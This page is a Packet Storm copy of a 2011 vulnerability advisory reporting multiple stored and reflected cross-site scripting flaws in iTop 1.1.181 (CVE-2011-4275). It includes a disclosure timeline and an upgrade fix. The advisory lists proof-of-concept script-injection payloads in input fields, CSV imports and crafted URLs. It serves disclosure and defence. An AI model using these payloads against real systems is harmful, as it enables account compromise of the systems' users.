exploit the possibilities

iTop 1.1.181 Cross Site Scripting

iTop 1.1.181 Cross Site Scripting
Posted Nov 23, 2011
Authored by Tobias Glemser

iTop version 1.1.181 suffers from multiple cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss
MD5 | e52ffb1cee405d95328bf9b631b1b74d

iTop 1.1.181 Cross Site Scripting

Change Mirror Download
TC-SA-2011-02: Multiple web-vulnerabilities in iTop version 1.1.181

Published: 2011/11/16
Version 1.0

Affected products:
iTop version 1.1.181, 1.2.0-RC-282 (maybe earlier versions as well)
http://sourceforge.net/projects/itop/

References:
CVE-2011-4275 - Multiple web-vulnerabilities in iTop
TC-SA-2011-02 www.tele-consulting.com/advisories/TC-SA-2011-02.txt
(used for updates)

Summary:
"IT Operations Portal: a complete open source, ITIL, web based
service management tool including a fully customizable CMDB,
a helpdesk system and a document management tool."
Several common flaws could be found in iTop like reflected
and stored XSS.


Vulnerable Scripts:
stored XSS:
- almost every tested input field stored in database and in the
html-content of the site.
Especially in case data is reformatted using Javascript, the
sanitisation in place
seems to be overridden.

reflected XSS:
- almost every test input field where the value is reflected in
servers output

Examples:
stored XSS:
- add a company named "XSS <script>alert("Help Me")</script>"
- add a database server named "XSS <script>alert("Help
Me")</script>"
- import a CSV-File where one cell contains "XSS <script>alert("Help
Me")</script>"
- copy&paste data (which does the same as CSV-import) using
1;Test 1
2;Test 2
3;Test 3<script>alert("23746234243 Test")</script>"

reflected XSS (un-authenticated):

http://$domain/iTop/pages/UI.php?auth_user=admin"><script>alert("Help
Me")</script><lala="&suggest_pwd=admin

reflected XSS (authenticated):

http://$domain/iTop/pages/UI.php?auth_user=admin"><script>alert("Help
Me")</script><lala="&suggest_pwd=admin

http://$domain/iTop/pages/UniversalSearch.php?c[menu]="<script>alert("Help
Me")</script>"

http://$domain/iTop/pages/UI.php?c%5bmenu%5d=60&class=Note&currentId=Searc
hFormToAdd_document_list \
&description="<script>alert("Help
Me")</script>"&dosearch=1&name=Acunetix&open=1&operation=search \
_form&org_id=3&status=draft&type=contract

http://domain/iTop/pages/audit.php?category=%22%3Cscript%3Ealert%281%29%3C
/script%3E%22&operation=errors&rule=1

http://$domain/iTop/pages/UI.php?auth_user=%22%20onmouseover%3dprompt%2894
9560%29%20bad%3d%22&suggest_pwd=test

http://$domain/iTop/pages/UI.php?auth_user=admin&suggest_pwd=%22%20onmouse
over%3dprompt%28972137%29%20bad%3d%22

Possible solutions:
- use version 1.2 final

Disclosure Timeline:
2011/08/09 vendor contacted via contact@combodo.com
2011/08/09 inital vendor response
2011/09/06 first patch by the vendor
2011/09/12 second patch by the vendor
2011/11/16 public disclosure

Credits:
Tobias Glemser (tglemser@tele-consulting.com)
Tele-Consulting security networking training GmbH, Germany
www.tele-consulting.com

Disclaimer:
All information is provided without warranty. The intent is to
provide information to secure infrastructure and/or systems, not
to be able to attack or damage. Therefore Tele-Consulting shall
not be liable for any direct or indirect damages that might be
caused by using this information.

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

November 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    28 Files
  • 2
    Nov 2nd
    1 Files
  • 3
    Nov 3rd
    1 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    19 Files
  • 6
    Nov 6th
    65 Files
  • 7
    Nov 7th
    22 Files
  • 8
    Nov 8th
    18 Files
  • 9
    Nov 9th
    1 Files
  • 10
    Nov 10th
    1 Files
  • 11
    Nov 11th
    11 Files
  • 12
    Nov 12th
    65 Files
  • 13
    Nov 13th
    27 Files
  • 14
    Nov 14th
    22 Files
  • 15
    Nov 15th
    18 Files
  • 16
    Nov 16th
    1 Files
  • 17
    Nov 17th
    3 Files
  • 18
    Nov 18th
    22 Files
  • 19
    Nov 19th
    17 Files
  • 20
    Nov 20th
    7 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close